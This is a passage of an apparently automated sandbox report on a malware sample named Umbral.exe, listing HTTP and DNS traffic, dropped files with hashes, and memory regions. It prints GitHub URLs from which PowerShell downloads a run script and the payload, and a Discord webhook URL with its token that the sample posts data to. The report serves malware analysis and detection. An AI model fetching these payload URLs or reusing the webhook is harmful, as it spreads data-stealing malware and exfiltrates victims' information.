      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 4
      x-ratelimit-reset: 1742741816
      x-ratelimit-reset-after: 1
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VefvBI8vo%2BCTCJwwRHoYRN40CMrE8gDEWxqR6c3d2BGoE4YgdGJ%2FHrkVeyeqtZ7rU1t62YvcWbLVjd9GezDcuIwPLcs29WAiVbwijDVBhzD%2F55q5kWnSN0zseemq"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Set-Cookie: __cfruid=3b03e9c435370e07efd604dac0ad4dd686130fce-1742741814; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Set-Cookie: _cfuvid=RGC9WzRs.sj6XETxDH2.G89R8f9fjqCmeN2pdLQzVbM-1742741814773-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 924ec7353cc763ba-LHR
    • flag-us
      POST
      https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK
      Umbral.exe
      Remote address:
      162.159.135.232:443
      Request
      POST /api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: multipart/form-data; boundary="7b69efb4-eee6-4014-929d-fb00a166fd1a"
      Host: discord.com
      Cookie: __cfruid=3b03e9c435370e07efd604dac0ad4dd686130fce-1742741814; _cfuvid=RGC9WzRs.sj6XETxDH2.G89R8f9fjqCmeN2pdLQzVbM-1742741814773-0.0.1.1-604800000
      Content-Length: 250
      Expect: 100-continue
      Response
      HTTP/1.1 404 Not Found
      Date: Sun, 23 Mar 2025 14:56:55 GMT
      Content-Type: application/json
      Content-Length: 45
      Connection: keep-alive
      Cache-Control: public, max-age=3600, s-maxage=3600
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 3
      x-ratelimit-reset: 1742741816
      x-ratelimit-reset-after: 1
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UNos1Z1HJ1MTGZXn5ffEEusekaYl98s311NgsAIdlqupbxcBlYHMv9cDaWKiZ7z0S38UylXw3cMeUGe4oKj3B9p%2Bl0n8OgbF%2FztGk7JV%2FsBPzCtWFsP%2FQNzlG2%2B8"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Server: cloudflare
      CF-RAY: 924ec736ae3363ba-LHR
    • 185.199.110.133:443
      https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe
      tls, http
      powershell.exe
      5.3kB
      248.4kB
      100
      185

      HTTP Request

      GET https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/download_and_run.ps1

      HTTP Response

      200

      HTTP Request

      GET https://raw.githubusercontent.com/sigmanip/reallogs123fr/refs/heads/main/Umbral.exe

      HTTP Response

      200
    • 20.26.156.215:443
      https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe
      tls, http
      powershell.exe
      904 B
      7.8kB
      9
      9

      HTTP Request

      GET https://github.com/sigmanip/reallogs123fr/raw/refs/heads/main/Umbral.exe

      HTTP Response

      302
    • 150.171.28.10:443
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=
      tls, http2
      2.0kB
      9.4kB
      22
      19

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

      HTTP Response

      204

      HTTP Request

      GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=788f789622a44a698461c384428b0670&localId=w:BDEEEA66-9FF9-032D-B4CB-199BE88F3227&deviceId=6896216899373042&anid=

      HTTP Response

      204
    • 172.217.16.227:443
      https://gstatic.com/generate_204
      tls, http
      Umbral.exe
      724 B
      4.9kB
      8
      8

      HTTP Request

      GET https://gstatic.com/generate_204

      HTTP Response

      204
    • 150.171.27.10:443
      https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      tls, http2
      108.3kB
      3.1MB
      2267
      2260

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388267_1DFP94UDBWNO6AJBT&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239340418585_1K319IV1QEN3HBC0V&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239339388266_1J4KSPP65Y4N6T5S1&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Response

      200

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239359748018_19NTYSZS66ZTQP557&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239359748010_1Q8ARU8JIAMP3E64P&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Response

      200

      HTTP Request

      GET https://tse1.mm.bing.net/th?id=OADD2.10239340418586_15W93I98EWXDJY7GO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

      HTTP Response

      200
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      12
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      13
    • 150.171.27.10:443
      tse1.mm.bing.net
      tls, http2
      1.2kB
      6.9kB
      15
      13
    • 208.95.112.1:80
      http://ip-api.com/json/?fields=225545
      http
      Umbral.exe
      309 B
      499 B
      5
      3

      HTTP Request

      GET http://ip-api.com/json/?fields=225545

      HTTP Response

      200
    • 162.159.135.232:443
      https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK
      tls, http
      Umbral.exe
      3.2kB
      6.9kB
      15
      18

      HTTP Request

      POST https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

      HTTP Response

      404

      HTTP Request

      POST https://discord.com/api/webhooks/1241809686664183896/9rYevcDZOTZa6fKNaplkhwVZjaOO4TEwZsMBjf_9Ri8SBoZYG-Pj3yYhDD-n3_oh-_yK

      HTTP Response

      404
    • 8.8.8.8:53
      raw.githubusercontent.com
      dns
      powershell.exe
      71 B
      135 B
      1
      1

      DNS Request

      raw.githubusercontent.com

      DNS Response

      185.199.110.133
      185.199.108.133
      185.199.111.133
      185.199.109.133

    • 8.8.8.8:53
      github.com
      dns
      powershell.exe
      56 B
      72 B
      1
      1

      DNS Request

      github.com

      DNS Response

      20.26.156.215

    • 8.8.8.8:53
      g.bing.com
      dns
      56 B
      148 B
      1
      1

      DNS Request

      g.bing.com

      DNS Response

      150.171.28.10
      150.171.27.10

    • 8.8.8.8:53
      gstatic.com
      dns
      Umbral.exe
      57 B
      73 B
      1
      1

      DNS Request

      gstatic.com

      DNS Response

      172.217.16.227

    • 8.8.8.8:53
      tse1.mm.bing.net
      dns
      62 B
      170 B
      1
      1

      DNS Request

      tse1.mm.bing.net

      DNS Response

      150.171.27.10
      150.171.28.10

    • 8.8.8.8:53
      ip-api.com
      dns
      Umbral.exe
      56 B
      72 B
      1
      1

      DNS Request

      ip-api.com

      DNS Response

      208.95.112.1

    • 8.8.8.8:53
      discord.com
      dns
      Umbral.exe
      57 B
      137 B
      1
      1

      DNS Request

      discord.com

      DNS Response

      162.159.135.232
      162.159.128.233
      162.159.136.232
      162.159.137.232
      162.159.138.232

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      3KB

      MD5

      556084f2c6d459c116a69d6fedcc4105

      SHA1

      633e89b9a1e77942d822d14de6708430a3944dbc

      SHA256

      88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

      SHA512

      0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      dd928c1e05ceaeb038435bd80ae202d5

      SHA1

      053d18346040076a78b2b76db7fbb5d083107c6f

      SHA256

      ca5de962a12b1e1a3f79ad576f73c5579fe7e98a27a0fcc39f1657c62aa76581

      SHA512

      9039f378c7d5f37ebeff507850cc9d9d42d74252969a2dc771f6eb831c0c1f86288a16b178059b3195f8ee674ae1d934898555b80216e8f8be1bd76cc7d00575

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      944B

      MD5

      88eaf43aaf449b93e958cdac1f3f5242

      SHA1

      f6f6c5da1ad3da543ee53344debf0c21c604a6ab

      SHA256

      cb7108dd71f6af89f8661c5867cfec031c22e2e6cb09108db77286a249af79bb

      SHA512

      83c5474afd2c078284270ece6d757830340375d5b07031f1ffe3a214dd44f1319905f286cd46cdb90bd9e3738930a1e1c08677768e67c52799bbbe4e9ea5edcd

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      966914e2e771de7a4a57a95b6ecfa8a9

      SHA1

      7a32282fd51dd032967ed4d9a40cc57e265aeff2

      SHA256

      98d3c70d7004fa807897317bd6cd3e977b9b6c72d4d2565aca0f9f8b1c315cba

      SHA512

      dc39c7124a9c7c8d4c7e8e16290c46360b8d9a8f4e43edaacbbeb09bdcf20159a53db54d2b322372001b6a3de52b2f88e9088b5fdbc7638816ae0d122bb015f5

    • C:\Users\Admin\AppData\Local\Temp\Umbral.exe

      Filesize

      227KB

      MD5

      68b35208a6ccc5cf6cfa41f86712e7ab

      SHA1

      34c735c3cc8fd7f9d225cd7323e5632aa772f465

      SHA256

      4a7c61f2655323ab50ae5d82063c96f5f8bad0ea39c0e6895b6354668b425279

      SHA512

      f05d7f10ee0a9ebef78696c86ec8f973242aafba3004cd6ee753b8ca44916b898befcca907b27ec711db60bb5141dc57cf36a00545cf4253136e1ecb63194f3f

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_onku1wnr.edd.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/2912-14-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-16-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-31-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-15-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-2-0x00007FFED4D03000-0x00007FFED4D05000-memory.dmp

      Filesize

      8KB

    • memory/2912-13-0x00007FFED4D00000-0x00007FFED57C1000-memory.dmp

      Filesize

      10.8MB

    • memory/2912-3-0x000002277FD70000-0x000002277FD92000-memory.dmp

      Filesize

      136KB

    • memory/5908-30-0x000001BF93280000-0x000001BF932C0000-memory.dmp

      Filesize

      256KB

    • memory/5908-55-0x000001BFAD970000-0x000001BFAD9C0000-memory.dmp

      Filesize

      320KB

    • memory/5908-56-0x000001BFADA40000-0x000001BFADAB6000-memory.dmp

      Filesize

      472KB

    • memory/5908-57-0x000001BF95010000-0x000001BF9502E000-memory.dmp

      Filesize

      120KB

    • memory/5908-64-0x000001BF95030000-0x000001BF9503A000-memory.dmp

      Filesize

      40KB

    • memory/5908-65-0x000001BFAD9E0000-0x000001BFAD9F2000-memory.dmp

      Filesize

      72KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.